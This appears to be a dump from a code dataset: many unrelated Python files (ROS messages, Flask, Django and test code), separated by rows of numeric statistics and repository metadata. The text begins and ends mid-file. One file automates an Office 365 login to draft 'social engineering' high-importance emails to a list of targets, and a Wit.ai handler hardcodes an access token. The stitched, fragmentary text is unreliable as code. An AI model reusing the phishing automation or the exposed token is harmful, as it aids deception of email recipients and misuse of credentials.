_k = cipher.encrypt((int.from_bytes(iv, 'big') + i).to_bytes(BLOCK_SIZE, 'big'))
_b = ct[BLOCK_SIZE * i: BLOCK_SIZE * (i + 1)]
plain += [_k[i] ^ _b[i] for i in range(0, len(_b))]
return ''.join([chr(a) for a in plain])
print(decrypt(questions[0], MODEL_CBC))
print(decrypt(questions[1], MODEL_CBC))
print(decrypt(questions[2], MODEL_CTR))
print(decrypt(questions[3], MODEL_CTR))
| 33.523077 | 167 | 0.679211 | 226 | 2,179 | 6.362832 | 0.345133 | 0.075104 | 0.030598 | 0.022949 | 0.098748 | 0.03338 | 0.03338 | 0.03338 | 0.03338 | 0 | 0 | 0.236135 | 0.197338 | 2,179 | 64 | 168 | 34.046875 | 0.586049 | 0.071592 | 0 | 0.136364 | 0 | 0 | 0.329534 | 0.311199 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022727 | false | 0 | 0.068182 | 0 | 0.113636 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5e043abcf5a29bdcffd9f45c532c8fa1ae641968 | 311 | py | Python | alpyro_msgs/actionlib/testrequestresult.py | rho2/alpyro_msgs | b5a680976c40c83df70d61bb2db1de32a1cde8d3 | [
"MIT"
] | 1 | 2020-12-13T13:07:10.000Z | 2020-12-13T13:07:10.000Z | alpyro_msgs/actionlib/testrequestresult.py | rho2/alpyro_msgs | b5a680976c40c83df70d61bb2db1de32a1cde8d3 | [
"MIT"
] | null | null | null | alpyro_msgs/actionlib/testrequestresult.py | rho2/alpyro_msgs | b5a680976c40c83df70d61bb2db1de32a1cde8d3 | [
"MIT"
] | null | null | null | from alpyro_msgs import RosMessage, boolean, int32
class TestRequestResult(RosMessage):
__msg_typ__ = "actionlib/TestRequestResult"
__msg_def__ = "aW50MzIgdGhlX3Jlc3VsdApib29sIGlzX3NpbXBsZV9zZXJ2ZXIKCg=="
__md5_sum__ = "61c2364524499c7c5017e2f3fce7ba06"
the_result: int32
is_simple_server: boolean
| 28.272727 | 74 | 0.829582 | 27 | 311 | 8.851852 | 0.814815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129964 | 0.109325 | 311 | 10 | 75 | 31.1 | 0.732852 | 0 | 0 | 0 | 0 | 0 | 0.369775 | 0.369775 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5e0b345e85244d00d3751d3404f05d4e2bfd639f | 269 | py | Python | bo/files/applicant/registulang/fileupload/pdf2txt/main.py | isoneday/KMS | 7d27e16af7626afd27a0980735985f5f2590f500 | [
"MIT"
] | null | null | null | bo/files/applicant/registulang/fileupload/pdf2txt/main.py | isoneday/KMS | 7d27e16af7626afd27a0980735985f5f2590f500 | [
"MIT"
] | null | null | null | bo/files/applicant/registulang/fileupload/pdf2txt/main.py | isoneday/KMS | 7d27e16af7626afd27a0980735985f5f2590f500 | [
"MIT"
] | null | null | null | from src import mining
from tkinter import filedialog
from PyQt4 import QtGui
dir=filedialog.askdirectory()
direcciones, nomArchivo = mining.path(dir)
cont=mining.coincidencias(direcciones,nomArchivo)
for i in range(len(nomArchivo)):
print(nomArchivo[i],cont[i]) | 24.454545 | 49 | 0.795539 | 36 | 269 | 5.944444 | 0.583333 | 0.196262 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004167 | 0.107807 | 269 | 11 | 50 | 24.454545 | 0.8875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
5e0cdea905b5b41aac70d7b34ce67692a178cd47 | 455 | py | Python | ip_system/models.py | 9dev/django-ip-system | 8d53fea89c0fcef3bdea27a893ce6a484b8b900a | [
"MIT"
] | null | null | null | ip_system/models.py | 9dev/django-ip-system | 8d53fea89c0fcef3bdea27a893ce6a484b8b900a | [
"MIT"
] | null | null | null | ip_system/models.py | 9dev/django-ip-system | 8d53fea89c0fcef3bdea27a893ce6a484b8b900a | [
"MIT"
] | null | null | null | from django.db import models
from .utils import get_ip_from_request
class Ip(models.Model):
address = models.GenericIPAddressField(unique=True, db_index=True)
@classmethod
def get_or_create(cls, request):
raw_ip = get_ip_from_request(request)
if not raw_ip:
return None
obj, _ = cls.objects.get_or_create(address=raw_ip)
return obj
def __str__(self):
return self.address.__str__()
| 22.75 | 70 | 0.679121 | 62 | 455 | 4.612903 | 0.483871 | 0.052448 | 0.062937 | 0.111888 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.241758 | 455 | 19 | 71 | 23.947368 | 0.828986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.153846 | 0.076923 | 0.692308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
5e0ee7490d2f9d87de60db0d3047b19a4411a85c | 1,267 | py | Python | binary_tree/tests/m_create_from_pre_in_test.py | dhrubach/python-code-recipes | 14356c6adb1946417482eaaf6f42dde4b8351d2f | [
"MIT"
] | null | null | null | binary_tree/tests/m_create_from_pre_in_test.py | dhrubach/python-code-recipes | 14356c6adb1946417482eaaf6f42dde4b8351d2f | [
"MIT"
] | null | null | null | binary_tree/tests/m_create_from_pre_in_test.py | dhrubach/python-code-recipes | 14356c6adb1946417482eaaf6f42dde4b8351d2f | [
"MIT"
] | null | null | null | from binary_tree.m_create_from_pre_in import BinaryTree
class TestBinaryTree:
def test_lc_data_1(self):
bt = BinaryTree()
preorder = [3, 9, 20, 15, 7]
inorder = [9, 3, 15, 20, 7]
ans = bt.buildFromPreInOrder(preorder=preorder, inorder=inorder)
assert ans.val == 3
assert ans.left.val == 9
assert ans.right.left.val == 15
preorder = [3, 9, 20, 15, 7]
inorder = [9, 3, 15, 20, 7]
ans = bt.buildFromPreInOrderOptimized(preorder=preorder, inorder=inorder)
assert ans.val == 3
assert ans.left.val == 9
assert ans.right.left.val == 15
def test_lc_data_2(self):
bt = BinaryTree()
preorder = [1, 2, 3]
inorder = [1, 3, 2]
ans = bt.buildFromPreInOrder(preorder=preorder, inorder=inorder)
assert ans.val == 1
assert ans.right.val == 2
assert ans.right.left.val == 3
def test_lc_data_3(self):
bt = BinaryTree()
preorder = [3, 9, 4, 2, 1, 5, 20, 15, 7]
inorder = [2, 4, 1, 9, 5, 3, 15, 20, 7]
ans = bt.buildFromPreInOrder(preorder=preorder, inorder=inorder)
assert ans.val == 3
assert ans.right.val == 20
assert ans.left.left.right.val == 1
| 29.465116 | 81 | 0.573796 | 177 | 1,267 | 4.028249 | 0.19774 | 0.151473 | 0.098177 | 0.168303 | 0.650771 | 0.621318 | 0.562412 | 0.562412 | 0.562412 | 0.562412 | 0 | 0.08371 | 0.302289 | 1,267 | 42 | 82 | 30.166667 | 0.722851 | 0 | 0 | 0.53125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.375 | 1 | 0.09375 | false | 0 | 0.03125 | 0 | 0.15625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5e15026007a09207c6424778c0b96d54f0620c12 | 1,725 | py | Python | tests/events/events_client_test.py | riaz-bordie-cko/checkout-sdk-python | d9bc073306c1a98544c326be693ed722576ea895 | [
"MIT"
] | null | null | null | tests/events/events_client_test.py | riaz-bordie-cko/checkout-sdk-python | d9bc073306c1a98544c326be693ed722576ea895 | [
"MIT"
] | null | null | null | tests/events/events_client_test.py | riaz-bordie-cko/checkout-sdk-python | d9bc073306c1a98544c326be693ed722576ea895 | [
"MIT"
] | null | null | null | import pytest
from checkout_sdk.events.events import RetrieveEventsRequest
from checkout_sdk.events.events_client import EventsClient
@pytest.fixture(scope='class')
def client(mock_sdk_configuration, mock_api_client):
return EventsClient(api_client=mock_api_client, configuration=mock_sdk_configuration)
class TestEventsClient:
def test_retrieve_all_event_types(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
assert client.retrieve_all_event_types() == 'response'
def test_retrieve_events(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
assert client.retrieve_events(RetrieveEventsRequest()) == 'response'
def test_retrieve_event(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
assert client.retrieve_event('event_id') == 'response'
def test_retrieve_event_notification(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
assert client.retrieve_event_notification('event_id', 'notification_id') == 'response'
def test_retry_webhook(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.post', return_value='response')
assert client.retry_webhook('event_id', 'webhook_id') == 'response'
def test_retry_all_webhooks(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.post', return_value='response')
assert client.retry_all_webhooks('event_id') == 'response'
| 46.621622 | 94 | 0.762899 | 207 | 1,725 | 6.057971 | 0.178744 | 0.064593 | 0.076555 | 0.133971 | 0.653908 | 0.5311 | 0.5311 | 0.5311 | 0.5311 | 0.5311 | 0 | 0 | 0.128696 | 1,725 | 36 | 95 | 47.916667 | 0.834331 | 0 | 0 | 0.24 | 0 | 0 | 0.221449 | 0.129855 | 0 | 0 | 0 | 0 | 0.24 | 1 | 0.28 | false | 0 | 0.12 | 0.04 | 0.48 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5e18e6288b6b07a784cee38e7f2cbe8ce2280ae9 | 548 | py | Python | crawler_main.py | yangwenke2010/template_crawler | b95e626184cda21d2abe01fd1f2b399e4946e782 | [
"Apache-2.0"
] | 4 | 2018-12-16T15:06:20.000Z | 2022-03-09T11:18:11.000Z | crawler_main.py | yangwenke2010/template_crawler | b95e626184cda21d2abe01fd1f2b399e4946e782 | [
"Apache-2.0"
] | 1 | 2018-10-12T07:32:13.000Z | 2018-10-12T07:32:13.000Z | crawler_main.py | yangwenke2010/template_crawler | b95e626184cda21d2abe01fd1f2b399e4946e782 | [
"Apache-2.0"
] | 2 | 2018-10-12T06:58:08.000Z | 2020-03-19T10:44:34.000Z | #!/bin/bash
# -*- coding: utf-8 -*-
# Crawler Main
#
# Author : Tau Woo
# Date : 2018-07-19
from do.crawler import Do
from sys import argv
if __name__ == "__main__":
'''Crawler Main
Start crawl websites with appointed config.
'''
# You will get appointed crawler name from command.
crawler_name = "sample" if len(argv) == 1 else argv[1]
crawler = Do(crawler_name)
crawler.do()
# Here is a test for data from redis to xlsx files.
# crawler.rds_to_xlsx("{}.xlsx".format(crawler_name), crawler_name)
| 22.833333 | 71 | 0.645985 | 79 | 548 | 4.303797 | 0.594937 | 0.161765 | 0.105882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02619 | 0.233577 | 548 | 23 | 72 | 23.826087 | 0.783333 | 0.458029 | 0 | 0 | 0 | 0 | 0.066038 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
5e1c13b5fde8efced653749af34695c0b5d9ba5a | 498 | py | Python | philia-service/wit-service/wit_service.py | BuildForSDGCohort2/masta-backend | 08c20fe910f8ab953714ac72f34cdead7a307bd3 | [
"MIT"
] | 1 | 2020-11-25T12:01:31.000Z | 2020-11-25T12:01:31.000Z | philia-service/wit-service/wit_service.py | BuildForSDGCohort2/masta-backend | 08c20fe910f8ab953714ac72f34cdead7a307bd3 | [
"MIT"
] | 6 | 2020-08-31T12:12:53.000Z | 2020-10-01T13:00:44.000Z | philia-service/wit-service/wit_service.py | BuildForSDGCohort2/masta-backend | 08c20fe910f8ab953714ac72f34cdead7a307bd3 | [
"MIT"
] | 1 | 2020-08-31T15:31:37.000Z | 2020-08-31T15:31:37.000Z | import json
from wit import Wit
access_token = "2PLFUWBVVTYQCSEL6VDJ3AFQLUCTV7ZH"
client = Wit(access_token=access_token)
def wit_handler(event, context):
utterance = 'good morning john'
response = client.message(msg=utterance)
intent = None
entity = None
try:
intent = list(response['intents'])[0]
entity = list(response['entities'])
except:
pass
return {
'statusCode': 200,
'body': json.dumps(intent, entity)
}
| 19.153846 | 49 | 0.63253 | 53 | 498 | 5.867925 | 0.641509 | 0.106109 | 0.090032 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021798 | 0.263052 | 498 | 25 | 50 | 19.92 | 0.825613 | 0 | 0 | 0 | 0 | 0 | 0.156942 | 0.064386 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0.055556 | 0.111111 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
5e25ad68634e5c0fbd0c26e49c6c7143c51f61a8 | 5,292 | py | Python | analytics/settings.py | Kratos-Freyja/analytics | 9de41b990e78e7a7ae912ebecd93fab50cb47320 | [
"MIT"
] | null | null | null | analytics/settings.py | Kratos-Freyja/analytics | 9de41b990e78e7a7ae912ebecd93fab50cb47320 | [
"MIT"
] | null | null | null | analytics/settings.py | Kratos-Freyja/analytics | 9de41b990e78e7a7ae912ebecd93fab50cb47320 | [
"MIT"
] | null | null | null | """
Django settings for analytics project.
Generated by 'django-admin startproject' using Django 1.11.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
from config import system
from config import database
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = system.APP_SECRET_KEY
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = system.DEBUG
ALLOWED_HOSTS = ['0.0.0.0', 'localhost']
# Session serializers
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
# Application definition
INSTALLED_APPS = [
'corsheaders',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'lead',
'fund',
'partner',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware',
]
# App urls
ROOT_URLCONF = 'analytics.urls'
CORS_ORIGIN_ALLOW_ALL = system.CORS_ORIGIN_ALLOW
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
BASE_DIR + system.TEMPLATE_PATH, # base templates
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379/1",
"TIMEOUT": None,
"OPTIONS": {
"MAX_ENTRIES": 1000,
"CLIENT_CLASS": "django_redis.client.DefaultClient",
"CONNECTION_POOL_KWARGS": {"max_connections": 100}
}
}
}
WSGI_APPLICATION = 'analytics.wsgi.application'
LOGIN_URL = '/login/'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
db: {
"ENGINE": database.config[db]["ENGINE"],
"NAME": database.config[db]["DB_NAME"],
"USER": database.config[db]["USERNAME"],
"PASSWORD": database.config[db]["PASSWORD"],
"HOST": database.config[db]["HOST"],
"PORT": database.config[db]["PORT"]
}
for db in database.config
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Calcutta'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
# Directory where static files are stored
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
BASE_DIR + "/",
]
STATIC_URL = STATICFILES_DIRS[1]
FILES_DIR = os.path.join(BASE_DIR, system.TEMP_FOLDER)
# logger settings
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"verbose": {
"format": "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
"datefmt": "%d/%b/%Y %H:%M:%S"
},
"simple": {
"format": "%(levelname)s %(message)s"
},
},
"handlers": {
"file": {
"level": "DEBUG",
"class": "logging.FileHandler",
"filename": "logs.log",
"formatter": "verbose"
},
},
"loggers": {
"django": {
"handlers": ["file"],
"propagate": True,
"level": "DEBUG",
},
"bo": {
"handlers": ["file"],
"level": "DEBUG",
},
"django.request": {
"handlers": ["file"],
"level": "DEBUG",
"propagate": False,
},
}
}
# RQ Queues
RQ_QUEUES = {
'default': {
'HOST': 'localhost',
'PORT': 6379,
'DB': 0,
'PASSWORD': 'some-password',
'DEFAULT_TIMEOUT': 360,
},
'high': {
'URL': os.getenv('REDISTOGO_URL', 'redis://localhost:6379/0'), # If you're on Heroku
'DEFAULT_TIMEOUT': 500,
},
'low': {
'HOST': 'localhost',
'PORT': 6379,
'DB': 0,
}
} | 24.164384 | 92 | 0.655518 | 584 | 5,292 | 5.835616 | 0.392123 | 0.061033 | 0.045188 | 0.05135 | 0.164613 | 0.140258 | 0.080399 | 0.080399 | 0.036092 | 0 | 0 | 0.017824 | 0.183673 | 5,292 | 219 | 93 | 24.164384 | 0.771065 | 0.213152 | 0 | 0.097403 | 1 | 0.006494 | 0.479807 | 0.293833 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.045455 | 0.019481 | 0 | 0.019481 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5e261f4a29f9c6da5e5d39b2f670faea1fe9471d | 4,396 | py | Python | production/tests/O365_SE_Email.py | GoVanguard/SeleniumBase | 29241d58ccba23bb94ebf4c4a51fad578c4aceb8 | [
"MIT"
] | null | null | null | production/tests/O365_SE_Email.py | GoVanguard/SeleniumBase | 29241d58ccba23bb94ebf4c4a51fad578c4aceb8 | [
"MIT"
] | null | null | null | production/tests/O365_SE_Email.py | GoVanguard/SeleniumBase | 29241d58ccba23bb94ebf4c4a51fad578c4aceb8 | [
"MIT"
] | null | null | null | """
The Office 365 Social Engineering Email draft producer uses a customized
library of methods in this master class to maintain continuous delivery.
This repository is controlled by a single boolean that is set to false by
default. Please ensure that the emailDraft.py file is correct.
"""
# Built-in Imports
import os
# SeleniumBase Web Application Testing Framework
from seleniumbase import BaseCase
# Selenium Exception Imports
from selenium.common.exceptions import NoSuchElementException
# Logging Import Setup
import logging
filename = '/SeleniumBase/production/tests/O365SEEmailLog/test.log'
format = '%(asctime)s %(levelname)s: %(message)s'
# Logging file setup
logging.basicConfig(filename=filename, format=format,
encoding='utf-8', level=logging.INFO)
class BaseTestCase(BaseCase):
def setUp(self):
super(BaseTestCase, self).setUp()
# <<< Run custom setUp() code for tests AFTER the super().setUp() >>>
def tearDown(self):
self.save_teardown_screenshot()
if self.has_exception():
# <<< Run custom code if the test failed. >>>
pass
else:
# <<< Run custom code if the test passed. >>>
pass
# (Wrap unreliable tearDown() code in a try/except block.)
# <<< Run custom tearDown() code BEFORE the super().tearDown() >>>
super(BaseTestCase, self).tearDown()
def clickCSSObject(self, CSSSelector):
if self.is_element_present(CSSSelector):
try:
self.click(CSSSelector)
print('CSS Object found: {0}'.format(CSSSelector))
except NoSuchElementException as exc:
print(exc)
print('CSS Object not found: {0}'.format(CSSSelector))
else:
print('CSS Object not found: {0}'.format(CSSSelector))
source = self.get_page_source()
logging.warning(source)
def createEmail(self, email):
toInput = 'input[aria-label="To"]'
ccInput = 'input[aria-label="Cc"]'
cc = os.getenv('O365_SE_TO', '')
subjectInput = 'input[aria-label="Add a subject"]'
subject = os.getenv('O365_SE_SUBJECT', '')
messageInput = 'input[aria-label="Message body"]'
message = os.getenv('O365_SE_MESSAGE', '')
moreOptions = '#compose_ellipses_menu'
importance = 'button[aria-label="Set importance"]'
highImportance = 'button[name="High"]'
clickChain1 = [moreOptions, importance, highImportance]
showMessageOptions = 'button[aria-label="Show message options..."]'
self.type(toInput, email)
self.type(ccInput, cc)
self.type(subjectInput, subject)
self.type(messageInput, message)
self.click_chain(clickChain1, spacing=0.1)
self.clickCSSObject(showMessageOptions)
def createEmails(self):
# <<< Load welcome page markdown. >>>
# Reduce duplicate code in tests by having reusable methods like this.
# If the UI changes, the fix can be applied in one place.
self.open('https://office.com/')
loginBtn = 'div[class="mectrl_header_text mectrl_truncate"]'
usernameInput = '#i0116'
username = os.getenv('O365_SE_USERNAME', 'testUser')
nextBtn = '#idSIButton9'
passwordInput = '#i0118'
password = os.getenv('O365_SE_PASSWORD', 'testPass')
doNotRetainCreds = '#idBtn_Back'
# outlook1 = 'a[aria-label="Outlook"]'
outlook = 'a[id="ShellMail_link"]'
# outlook3 = '#20AC5DE0-9796-4393-8656-9711B92C5223'
newMessage1 = '#id__6'
# newMessage2 = '#id__1718'
self.clickCSSObject(loginBtn)
self.clickCSSObject(usernameInput)
self.type(usernameInput, username)
self.clickCSSObject(nextBtn)
self.type(passwordInput, password)
self.clickCSSObject(nextBtn)
self.clickCSSObject(doNotRetainCreds)
# self.clickCSSObject(outlook1)
self.wait_for_element(outlook)
self.clickCSSObject(outlook)
# self.clickCSSObject(outlook3)
self.wait_for_element(newMessage1)
self.clickCSSObject(newMessage1)
# self.clickCSSObject(newMessage2)
stringList = os.getenv('O365_SE_EMAILS', '')
emailList = stringList.split()
for email in emailList:
self.createEmail(email)
| 39.25 | 78 | 0.64354 | 472 | 4,396 | 5.919492 | 0.434322 | 0.070866 | 0.02577 | 0.030064 | 0.044381 | 0.044381 | 0.028633 | 0.028633 | 0 | 0 | 0 | 0.024442 | 0.246133 | 4,396 | 111 | 79 | 39.603604 | 0.818648 | 0.251592 | 0 | 0.106667 | 0 | 0 | 0.19252 | 0.080319 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0.066667 | 0.093333 | 0 | 0.173333 | 0.053333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
5e354afb63b174f5f617ab1a12d24daceb3e23d7 | 1,879 | py | Python | anchore_engine/db/db_users.py | bjwschaap/anchore-engine | 0aba1d12d79f63c5919ad301cecc5bd5cc09325a | [
"Apache-2.0"
] | null | null | null | anchore_engine/db/db_users.py | bjwschaap/anchore-engine | 0aba1d12d79f63c5919ad301cecc5bd5cc09325a | [
"Apache-2.0"
] | null | null | null | anchore_engine/db/db_users.py | bjwschaap/anchore-engine | 0aba1d12d79f63c5919ad301cecc5bd5cc09325a | [
"Apache-2.0"
] | null | null | null | import time
from anchore_engine import db
from anchore_engine.db import User
def add(userId, password, inobj, session=None):
if not session:
session = db.Session()
#our_result = session.query(User).filter_by(userId=userId, password=password).first()
our_result = session.query(User).filter_by(userId=userId).first()
if not our_result:
our_result = User(userId=userId, password=password)
if 'created_at' not in inobj:
inobj['created_at'] = int(time.time())
our_result.update(inobj)
session.add(our_result)
else:
inobj['password'] = password
our_result.update(inobj)
return(True)
def get_all(session=None):
if not session:
session = db.Session()
ret = []
our_results = session.query(User).filter_by()
for result in our_results:
obj = {}
obj.update(dict((key,value) for key, value in vars(result).items() if not key.startswith('_')))
ret.append(obj)
return(ret)
def get(userId, session=None):
if not session:
session = db.Session()
ret = {}
result = session.query(User).filter_by(userId=userId).first()
if result:
obj = dict((key,value) for key, value in vars(result).items() if not key.startswith('_'))
ret = obj
return(ret)
def update(userId, password, inobj, session=None):
return(add(userId, password, inobj, session=session))
def delete(userId, session=None):
if not session:
session = db.Session()
ret = False
result = session.query(User).filter_by(userId=userId).first()
if result:
session.delete(result)
ret = True
# try:
# session.commit()
# ret = True
# except Exception as err:
# raise err
# finally:
# session.rollback()
return(ret)
| 23.4875 | 103 | 0.610963 | 236 | 1,879 | 4.775424 | 0.228814 | 0.031056 | 0.070985 | 0.097604 | 0.542147 | 0.44898 | 0.44898 | 0.44898 | 0.414374 | 0.334516 | 0 | 0 | 0.267696 | 1,879 | 79 | 104 | 23.78481 | 0.819041 | 0.130389 | 0 | 0.361702 | 0 | 0 | 0.018462 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106383 | false | 0.106383 | 0.06383 | 0.021277 | 0.170213 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
eaa6e1abc664210c2d20b6da218369d841465733 | 3,306 | py | Python | backend/lost/api/user/login_manager.py | JonasGoebel/lost | 802be42fb6cd7d046db61a34d77c0b5d233eca46 | [
"MIT"
] | 490 | 2019-01-16T12:57:22.000Z | 2022-03-26T14:13:26.000Z | backend/lost/api/user/login_manager.py | JonasGoebel/lost | 802be42fb6cd7d046db61a34d77c0b5d233eca46 | [
"MIT"
] | 147 | 2019-01-23T13:22:42.000Z | 2022-03-30T11:14:08.000Z | backend/lost/api/user/login_manager.py | JonasGoebel/lost | 802be42fb6cd7d046db61a34d77c0b5d233eca46 | [
"MIT"
] | 91 | 2019-03-11T10:37:50.000Z | 2022-03-28T16:41:32.000Z | import datetime
from flask_ldap3_login import LDAP3LoginManager, AuthenticationResponseStatus
from lost.settings import LOST_CONFIG, FLASK_DEBUG
from flask_jwt_extended import create_access_token, create_refresh_token
from lost.db.model import User as DBUser, Group
from lost.db import roles
class LoginManager():
def __init__(self, dbm, user_name, password):
self.dbm = dbm
self.user_name = user_name
self.password = password
def login(self):
if LOST_CONFIG.ldap_config['LDAP_ACTIVE']:
access_token, refresh_token = self.__authenticate_ldap()
else:
access_token, refresh_token = self.__authenticate_flask()
if access_token and refresh_token:
return {
'token': access_token,
'refresh_token': refresh_token
}, 200
return {'message': 'Invalid credentials'}, 401
def __get_token(self, user_id):
expires = datetime.timedelta(minutes=LOST_CONFIG.session_timeout)
